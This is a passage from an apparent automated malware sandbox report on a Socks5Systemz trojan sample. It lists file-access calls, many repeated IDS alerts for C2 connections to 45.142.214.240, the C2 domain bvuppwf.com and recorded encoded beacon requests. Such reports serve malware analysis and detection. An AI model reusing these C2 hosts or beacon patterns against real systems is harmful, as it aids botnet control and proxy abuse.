        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  Code function: 1_2_00460658 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  Code function: 1_2_0045EC50 FindFirstFileA,FindNextFileA,FindClose
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  Code function: 1_2_00491EBC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  File opened: C:\Users\user\AppData\Roaming
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  File opened: C:\Users\user
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  File opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  File opened: C:\Users\user\AppData
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

        Networking

        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49736 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49736 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49740 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49740 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49741 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49741 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49742 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49742 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49743 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49743 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49744 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49744 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49745 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49745 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49746 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49746 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49748 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49748 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49749 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49749 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49750 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49750 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49751 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49751 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49752 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49752 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49753 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49753 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49754 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49754 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49755 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49755 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49756 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49756 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49757 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49757 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49758 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49758 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49759 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49759 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49760 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49760 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49761 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49761 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49762 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49762 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49763 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49763 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49764 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49764 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49765 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49765 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49766 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49766 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49767 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49767 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49768 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49768 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49769 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49769 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49770 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49770 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49771 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49771 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49772 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49772 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49773 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49773 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49774 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49774 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49775 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49775 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49776 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49776 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49777 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49777 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49778 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49778 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49779 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49779 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49780 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49780 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49781 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49781 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49782 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49782 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49783 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49783 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49784 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49784 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49785 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49785 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49786 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49786 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49787 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49787 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49788 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49788 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49789 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49789 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49790 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49790 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49791 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49791 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49792 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49792 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49793 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49793 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49794 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49794 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49795 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49795 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49796 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49796 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49797 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49797 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49798 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49798 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49799 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49799 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49800 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49800 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49801 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49801 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49802 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49802 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49803 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49803 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49804 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49804 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49805 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49805 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49806 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49806 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49807 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49807 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49808 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49808 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49809 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49809 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49810 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49810 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49811 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49811 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49812 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49812 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49813 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49813 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49814 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49814 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49815 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49815 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49816 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49816 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49817 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49817 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49818 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49818 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49819 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49819 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.4:49820 -> 45.142.214.240:80
        Source: Traffic  Snort IDS: 2050112 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 192.168.2.4:49820 -> 45.142.214.240:80
        Source: Malware configuration extractor  URLs: bvuppwf.com
        Source: global traffic  TCP traffic: 192.168.2.4:49737 -> 88.80.148.19:2023
        Source: Joe Sandbox View  IP Address: 88.80.148.19
        Source: Joe Sandbox View  IP Address: 45.142.214.240
        Source: Joe Sandbox View  ASN Name: ALEXHOSTMD
        Source: global traffic  HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ec909e3b HTTP/1.1  Host: bvuppwf.com  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global traffic  HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1  Host: bvuppwf.com  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global traffic  HTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1  Host: bvuppwf.com  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
